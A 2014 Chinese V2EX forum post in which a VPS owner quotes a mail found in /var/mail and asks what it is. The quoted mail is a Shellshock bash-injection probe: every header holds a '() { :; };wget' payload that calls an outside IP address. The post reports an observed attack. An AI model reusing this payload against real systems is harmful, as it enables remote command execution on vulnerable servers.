首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
广告
0zero0
V2EX  ›  信息安全

Shellshock 后遗症?

  •   
  •   0zero0 · 2014-10-20 09:19:36 +08:00 · 3123 次点击
    这是一个创建于 3685 天前的主题,其中的信息可能已经有所发展或是发生改变。
    每天都会看看VPS上的“/var/mail/root”,了解一下crontab任务执行得怎么样了;

    前天在不经意间发现“/var/mail/”里面多了个文件,而且内容(稍作打码处理)也比较坑……
    ====
    From MAILER-DAEMON Fri Oct 17 00:53:38 2014
    Return-Path: <>
    X-Original-To: nobody
    Delivered-To: [email protected]
    Received: from unknown (unknown [114.91.101.18])
    by hi.me (Postfix) with SMTP id 02D43C0022
    for <nobody>; Fri, 17 Oct 2014 00:53:36 +0800 (CST)
    To:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    References:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    Cc:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    From:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    Subject:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    Date:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    Message-ID:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    Comments:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    Keywords:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    Resent-Date:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    Resent-From:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114
    Resent-Sender:() { :; };wget http://104.131.141.12:443/vul/107.111.222.114

    wget http://104.131.141.12:443/vul/107.111.222.114

    ====
    想问问大家都有碰到这个问题么?(其实我也不担心,安全措施基本上都做了,就算被攻击了也不是太在意,因为有备份的习惯,这里只是单纯的想问问情况以及缘由,3ks)
    目前尚无回复
    wgetresentfri
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3112 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 472ms · UTC 13:44 · PVG 21:44 · LAX 05:44 · JFK 08:44
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.